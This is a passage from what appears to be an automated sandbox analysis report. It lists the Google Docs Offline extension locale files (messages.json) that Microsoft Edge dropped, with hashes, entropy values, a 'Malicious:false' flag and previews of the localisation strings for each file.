                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ms\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):936
                                                                                        Entropy (8bit):4.457879437756106
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\my\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):3830
                                                                                        Entropy (8bit):3.5483353063347587
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ne\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1898
                                                                                        Entropy (8bit):4.187050294267571
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\nl\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):914
                                                                                        Entropy (8bit):4.513485418448461
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\no\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):878
                                                                                        Entropy (8bit):4.4541485835627475
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\pa\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2766
                                                                                        Entropy (8bit):3.839730779948262
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\pl\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):978
                                                                                        Entropy (8bit):4.879137540019932
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):907
                                                                                        Entropy (8bit):4.599411354657937
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):914
                                                                                        Entropy (8bit):4.604761241355716
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ro\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):937
                                                                                        Entropy (8bit):4.686555713975264
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\ru\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1337
                                                                                        Entropy (8bit):4.69531415794894
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\si\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2846
                                                                                        Entropy (8bit):3.7416822879702547
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\sk\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):934
                                                                                        Entropy (8bit):4.882122893545996
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\sl\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):963
                                                                                        Entropy (8bit):4.6041913416245
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\sr\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1320
                                                                                        Entropy (8bit):4.569671329405572
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                        MD5:7F5F8933D2D078618496C67526A2B066
                                                                                        SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                        SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                        SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
